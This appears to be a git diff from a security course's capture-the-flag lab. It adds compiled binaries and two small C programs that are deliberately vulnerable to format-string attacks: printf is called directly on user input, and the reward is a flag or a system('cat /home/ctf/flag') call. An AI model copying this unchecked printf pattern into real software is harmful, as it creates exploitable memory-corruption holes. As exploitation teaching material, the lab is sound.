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

literal 0
HcmV?d00001

diff --git a/pa/lab7/06_write_big_number.c b/pa/lab7/06_write_big_number.c
new file mode 100644
index 0000000..430393c
--- /dev/null
+++ b/pa/lab7/06_write_big_number.c
@@ -0,0 +1,29 @@
+// gcc -m32 -Wall -Wextra -ggdb -no-pie
+
+#include <stdio.h>
+#include <unistd.h>
+#include "get_flag.h"
+
+#define BUFFER_LEN 128
+
+unsigned int target_before = 0;
+unsigned int target = 0;
+unsigned int target_after = 0;
+
+void vuln() {
+    char buffer[BUFFER_LEN] = {0};
+    read(0, buffer, BUFFER_LEN-1);
+
+    printf(buffer);
+
+    if (target == 0xdeadbeef) {
+        printf("Success! You hit the target!\n");
+        printf("Here is your flag: %s\n", get_flag());
+    } else {
+        printf("Oops, not quite! The target was: 0xdeadbeef\nCurrent value is 0x%08x\n", target);
+    }
+}
+
+int main() {
+    vuln();
+}
diff --git a/pa/lab7/07_call_functions b/pa/lab7/07_call_functions
new file mode 100755
index 0000000000000000000000000000000000000000..ce4047c9563680ce0d899b541e555ea190f8ecc6
GIT binary patch
literal 18468
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
VRZ{J8#Z+mxsz-=>l@dCY{cjWl{8az|

literal 0
HcmV?d00001

diff --git a/pa/lab7/07_call_functions.c b/pa/lab7/07_call_functions.c
new file mode 100644
index 0000000..ce68c62
--- /dev/null
+++ b/pa/lab7/07_call_functions.c
@@ -0,0 +1,24 @@
+// gcc -m32 -Wall -Wextra -ggdb -no-pie
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+#define BUFFER_LEN 128
+
+void win() {
+    printf("You win!");
+    system("cat /home/ctf/flag");
+}
+
+void vuln() {
+    char buffer[BUFFER_LEN] = {0};
+    read(0, buffer, BUFFER_LEN-1);
+
+    printf(buffer);
+    puts("Bye!\n");
+}
+
+int main() {
+    vuln();
+}
diff --git a/pa/lab7/08_return b/pa/lab7/08_return
new file mode 100755
index 0000000000000000000000000000000000000000..d28acc77f3c4afe975d00279d4172cef106ecce1
GIT binary patch
literal 18400
zcmeHPeQ;CPmA{gn?Dw#cjd2NIEh3n#li2b{90LIo+t>yY1LmuNLh_KMCrd?^+@~i8
zCrkos*p#x~aT=Otx7}$r-H+L6)9rL<x0}gyNlX%$>F%cNAI)@Tw``MU)G0fgge043
zXtlrJeY&zR&FshQUmaaII`^FOyI<#Cy?5@@yMC;HaKPj72$j6TCn#N>*7Q#B?q1i@
zDMBJ3nna^mC90sJt@9W#pkpXN(x4;xKxZMJJ+A4bg^)?KK`jXkg*2V?O%x!}F6xSQ
zaDhIMreP!b%k3cu&%h2^?iGSmUOvz&MBwi=owOW{hCu8$>jzXcz}^5GDG!-MJL@1_
z0R95{PC5jcq-?u??!>OZeg!tta@a`9J_LJXNQg%Cjg*3or0hFkhj>F``yBQz*vtF>
z9&{v@N3)_el^kwO#adFybnZwvn+bQgwg%YXCb4<@Uh)3nvlqYq`hR}+(Mzx2w)2sH
zJ@Iaf^HY`&faphJ;D>Y6u?#ueX8p7=QBPknkynFgm-7%3A!McQx%=KY$9#EOStisY
zzjTg#&m8%dIdZH_4k6!CCbPa8kOtqf-wW_hz$a1qqDz=tcbHixmQ0(utQ8Yub~5e6
zg>6M*B0G_FtWjZ_L<1DD9dk62OhW@9df1F64x8~vG9@+-ZtdM<c7!`ixi)}CMl<PR
zF_Rtg;-63Y#tYAQkfVR-N2Z2kaz4E{ggkY1Qud0^(1>&mYp)8<44l*SY80#^hoc+F
z;rzwq7~pbpxp>`jmCuR?DjukKpyGjw2Pz(@c%b5eiU%qlsCeN2;(@ERpZaL`<P|-?
z3LB8)Ggq-KK0SG@P$--{=XeXRO`g{e%#_z#xKqP!q_A4YXYGn^!SV?Le(^IDicd>f
zr+jHv=H}-YFU`t}DSu~H4pDx#Bo|h5M-;DJ(I;g6h1J{{mCM{AmCM{ImCM{Q&C2cn
z{@|&9n|$-_p*_3utI*W(8Sbv9CWrpHP#Bt;yo{a>?fmqs=brzfrVr(xM?c;>y}WTI
zJ{_Ny<B>T^kd?s|<I~@7LQ@<0;WU09bqn}y+1^t>pS;qLpq4JIyErp-R&H?P(<)a~
zxaC`jJoVCx`4unz%IkUUM;|(&=Ve`&oSS4_bwh4tm)y#nTZF2I{yrw#7df|GJ)gh`
zUh%U|PpRc{{4c-2Qm7acujOw8`uNPRu)&_Z5}2CQFT)%8lfNkx(3aFJkeVl5&GhL9
zu3eldmcM`Z@hj8lX#Oo2kI#G$by$DKrx2(5-)lej>PZJxa~xA&I)a>Z&)=<}`Nvnk
zfu=wE*p!3}eOBbP*#=!*-m4nyf6uzZ&srUS{yElWeR#lpK=lFhn#cBE_}8HId{nh_
zapttfDU?0U9|qv~%Zq@x|I-+B;M6ZqA8l;P7qHN${<IEdrcMU%dF#xJA9<Zy+dnAI
z&eS-3qTOF`8k;4Z`7TkDuXx~^byst5Or8%Mco1DtaLfzan>pR=uAbuh*`0so*YwX*
z&GfOJUkiyi`MvvwG(AGo-0vDXT}c%WR6J1eK*a+U4^%u*@j%4`6%SNAQ1QV3n+NzC
